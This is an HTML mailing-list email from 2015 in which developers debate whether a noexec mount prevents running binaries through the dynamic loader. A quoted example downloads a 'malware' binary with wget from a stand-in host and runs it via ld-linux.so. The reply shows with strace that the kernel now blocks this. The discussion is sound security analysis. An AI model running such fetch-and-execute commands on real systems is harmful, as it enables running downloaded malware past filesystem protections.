<div dir="ltr"><div class="gmail_extra"><div class="gmail_quote">On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald <span dir="ltr"><<a href="mailto:h.reindl@thelounge.net" target="_blank">h.reindl@thelounge.net</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><br>
<br>
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:<br>
<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><span class="">
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie<br></span>
<<a href="mailto:simon.mcvittie@collabora.co.uk" target="_blank">simon.mcvittie@collabora.co.<u></u>uk</a> <mailto:<a href="mailto:simon.mcvittie@collabora.co.uk" target="_blank">simon.mcvittie@<u></u>collabora.co.uk</a>>><br>
wrote:<br>
<br>
    wget <a href="http://example.com/malware.__x86.bin" target="_blank">http://example.com/malware.__<u></u>x86.bin</a><span class=""><br>
    <<a href="http://example.com/malware.x86.bin" target="_blank">http://example.com/malware.<u></u>x86.bin</a>><br>
    /lib/ld-linux.so.2 malware.x86.bin<br>
<br>
<br>
Pretty sure this no longer works; these days noexec prevents<br>
mmap(PROT_EXEC) as well<br>
</span></blockquote>
<br>
you should not assume when you can try it simple<br>[...]<br>
[root@arrakis:~]$ bash /Volumes/dune/test.sh<br>
config-3.18.7-100.fc20.x86_64  grub2 initramfs-3.18.7-100.fc20.x86_<u></u>64.img  initrd-plymouth.img  lost+found System.map-3.18.7-100.fc20.<u></u>x86_64  vmlinuz-3.18.7-100.fc20.x86_64<br></blockquote><div><br></div><div>And you should not reply before you read the actual post, in which I specifically reply to a comment about ld-linux.so – not script interpreters, which don't rely on this function.</div><div><br></div><div># mount | grep /test</div><div>/test.img on /mnt/test type ext4 (rw,noexec,relatime,data=ordered)</div><div># cp -a /bin/echo /mnt/test/echo</div><div># chmod a+rx /mnt/test/echo</div><div># /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo</div><div>/mnt/test/echo: error while loading shared libraries: /mnt/test/echo: failed to map segment from shared object</div><div><div># strace /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo</div><div><div>open("/mnt/test/echo", O_RDONLY|O_CLOEXEC) = 3</div></div><div>mmap(0x400000, 28672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = -1 EPERM (Operation not permitted)</div></div><div>#</div></div><div><br></div>-- <br><div class="gmail_signature"><div dir="ltr">Mantas Mikulėnas <<a href="mailto:grawity@gmail.com" target="_blank">grawity@gmail.com</a>></div></div>
</div></div>